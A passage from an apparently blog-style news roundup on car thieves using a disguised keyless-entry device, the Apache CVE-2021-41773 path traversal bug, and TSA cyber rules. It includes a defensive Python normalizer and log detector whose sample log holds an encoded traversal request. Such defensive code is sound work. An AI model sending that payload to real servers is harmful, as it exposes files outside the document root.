public health crisis has made it an open season for car thieves across America. As it turns out, the phenomenon is not just limited to the states, it’s spilled over into the UK as well. This time though, the thieves’ nefarious intentions were hidden in a form factor that just made people think they were playing Super Mario Land.
That’s right folks, a merry band of British thieves was arrested this week on suspicion of stealing cars. In their possession was an electronic hacking device designed to work around vehicle security systems. Shockingly, the device was nearly identical to that of a Nintendo Game Boy.
Inside the case could be a wide array of different components and hardware. Devices of this variety are relatively easy to find on websites like Alibaba and Wish.com.
These particular thieves were caught attempting to steal a Mitsubishi Outlander PHEV on CCTV in a parking lot in West Yorkshire.
Car Thieves Arrested After Using $27,000 ‘Game Boy’
The gang used “a handheld device disguised as a Nintendo Game Boy”
https://kotaku.com/car-thieves-arrested-using-27-000-game-boy-1847806007
As the BBC reports, the device, worth around £20,000 (USD$27,000), is able to not just get past a car’s security system, but also start the engine as well. This allows the thieves to quickly drive off with the stolen vehicle.
In this case, the device was hidden inside a fake Game Boy case.
Det Insp Vicky Vessey from West Yorkshire Police told the BBC, “The utter disregard they had for the victims, whose hard-earned vehicles were whisked away in seconds, is totally apparent from the flippant tone heard on the video footage we recovered from one of their phones.”
While a device like this seems like something out of a video game, allowing thieves to just walk up to any car and steal it, each one of these has to be heavily tailored to match the security and coding of a particular vehicle; in this case, the thieves could only steal Mitsubishi Outlanders.
Tomi Engdahl says:
Yorkshire gang’s Game Boy device could unlock car in seconds
https://www.bbc.com/news/uk-england-leeds-58788627
A gang of car thieves used a handheld device disguised as a Nintendo Game Boy to steal vehicles worth £180,000.
Dylan Armer, Christopher Bowes and Thomas Poulson stole five Mitsubishi Outlanders by using the gadget to bypass the cars’ security systems.
West Yorkshire Police said the device, worth £20,000, could unlock and start a car “in a matter of seconds”.
Police said footage recovered from Poulson’s phone showed him demonstrating “how quickly and easily the gadget gave them full access to the vehicles, accompanied by a commentary in mocking tones”.
The force added that the “significant investment required to buy one of the sophisticated devices suggested the thefts were planned and orchestrated crimes”.
Det Insp Vicky Vessey said the three men would have brought “distress, trauma and inconvenience to all the victims affected by their crimes”.
“The utter disregard they had for the victims, whose hard-earned vehicles were whisked away in seconds, is totally apparent from the flippant tone heard on the video footage we recovered from one of their phones,” she said.
Tomi Engdahl says:
Apache HTTP Server Project patches exploited zero-day vulnerability
The critical vulnerability is being actively exploited in the wild.
https://www.zdnet.com/article/apache-http-server-project-patches-exploited-zero-day-vulnerability/
According to a security advisory dated October 5, the bug is known to be actively exploited in the wild.
The release of Apache HTTP Server version 2.4.49 fixed a slew of security flaws including a validation bypass bug, NULL pointer dereference, a denial-of-service issue, and a severe Server-Side Request Forgery (SSRF) vulnerability.
However, the update also inadvertently introduced a separate, critical issue: a path traversal vulnerability that can be exploited to map and leak files.
Tracked as CVE-2021-41773, the security flaw was discovered by Ash Daulton of the cPanel security team in a change made to path normalization in the server software.
“An attacker could use a path traversal attack to map URLs to files outside the expected document root,” the developers say. “If files outside of the document root are not protected by ‘Require all denied’ these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts.”
Positive Technologies has reproduced the bug and Will Dormann, vulnerability analyst at CERT/CC, says that if the mod-cgi function is enabled on Apache HTTP Server 2.4.49, and the default Require all denied function is missing, then “CVE-2021-41773 is as RCE [remote code execution] as it gets.”
CVE-2021-41773 only impacts Apache HTTP Server 2.4.49.
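The two defensive points in the article above, that path normalization must decode percent-encoding before it removes dot segments and that requests carrying such segments are worth alerting on, as an added Python example that is not code from the Apache project or from the article. The document root, the access-log lines and the request targets are constructed for illustration:

```python
import os
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined-log style); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.7 - - [05/Oct/2021:10:00:02 +0000] "GET /static/.%2e/.%2e/secrets.txt HTTP/1.1" 403 199 "-" "curl/7.68.0"
203.0.113.9 - - [05/Oct/2021:10:00:03 +0000] "GET /docs/../index.html?x=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Pulls method and request-target out of a combined-log request field.
LOG_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalize_url_path(url_path):
    """Map a request path to a canonical path under '/'.

    Percent-decoding happens *before* dot-segment removal, so an encoded
    '%2e%2e' is treated exactly like a literal '..'.  Returns None when the
    path would climb above the root or carries a NUL byte.
    """
    decoded = unquote(url_path.split("?", 1)[0])
    if "\x00" in decoded:
        return None
    parts = []
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue            # empty ('//') and '.' segments carry no meaning
        if seg == "..":
            if not parts:
                return None     # would escape the document root: refuse
            parts.pop()
        else:
            parts.append(seg)
    return "/" + "/".join(parts)


def map_to_docroot(docroot, url_path):
    """Resolve url_path to a filesystem path, or None if it leaves docroot."""
    norm = normalize_url_path(url_path)
    if norm is None:
        return None
    root = os.path.abspath(docroot)
    target = os.path.abspath(os.path.join(root, norm.lstrip("/")))
    # Independent containment check on the final path, in case the
    # normalization above ever regresses (the class of bug in the article).
    if os.path.commonpath([root, target]) != root:
        return None
    return target


def contains_dot_dot(url_path):
    """True if the decoded request path has any '..' segment, encoded or not."""
    decoded = unquote(url_path.split("?", 1)[0])
    return any(seg == ".." for seg in decoded.split("/"))


def find_traversal_attempts(log_text):
    """Return request targets from an access log that carry '..' segments.

    Well-behaved clients collapse dot segments before sending, so any that
    reach the server, especially percent-encoded ones, deserve a look
    regardless of the status code the server returned.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_REQUEST.search(line)
        if m and contains_dot_dot(m.group("target")):
            hits.append(m.group("target"))
    return hits


if __name__ == "__main__":
    for target in ("/index.html", "/static/.%2e/.%2e/secrets.txt"):
        print(target, "->", map_to_docroot("/var/www/html", target))
    print("suspicious:", find_traversal_attempts(SAMPLE_LOG))
```

The ordering inside `normalize_url_path` is the whole point: a normalizer that strips `..` first and decodes afterwards lets an encoded dot segment through, which is the class of mistake the article attributes to the 2.4.49 path-normalization change. The containment check in `map_to_docroot` plays the same role as a default-deny `Require all denied` on the filesystem root in httpd.conf: a second line that holds even when the first one fails. Note that the detection helper flags the third log line too, although that request never left the document root; a 200 response to a `..` request is still worth knowing about.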
Tomi Engdahl says:
New cybersecurity regulations released by TSA for trains and planes
Emergency cybersecurity regulations for pipeline operators issued this summer were also released publicly this week.
https://www.zdnet.com/article/new-cybersecurity-regulations-released-by-tsa-for-trains-and-planes/